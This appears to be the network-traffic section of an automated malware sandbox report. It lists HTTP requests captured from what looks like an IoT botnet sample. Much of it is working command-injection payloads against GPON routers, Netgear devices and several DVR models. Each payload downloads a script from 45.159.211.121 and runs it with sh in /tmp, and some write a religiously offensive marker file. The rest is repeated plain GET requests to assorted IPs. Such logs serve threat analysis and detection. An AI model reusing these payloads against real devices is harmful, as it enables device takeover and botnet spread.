Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.53Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.53Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.53Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.53Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.53Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.53Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.53Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.75Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.75Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.75Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.75Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.75Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.75Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.75Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.91Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.83Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.91Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.83Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.83Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.83Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.83Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.83Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 157.230.19.197Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 104.21.84.89Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.135.83.132Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.135.83.132Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.135.83.132Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.135.83.132Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.135.83.132Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.135.83.132Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.135.83.132Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.91Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.91Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.91Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.91Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.91Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.120Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.120Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.120Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.120Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.120Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.120Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.120Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.156Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.156Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.156Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.156Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.156Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.156Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.156Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.191Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 104.21.49.253Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.191Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.191Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.191Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.191Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.191Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.191Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.96.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 188.114.97.3Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 90.156.201.102Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 90.156.201.102Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 90.156.201.123Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 172.67.198.22Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 90.156.201.54Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 90.156.201.102Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 90.156.201.102Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 90.156.201.123Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 90.156.201.54Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 90.156.201.123Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 90.156.201.54Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 90.156.201.29Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.12.92.157Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.200.28.226Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.26.122.75Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.26.122.75Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.26.122.75Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.74Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.74Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.74Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
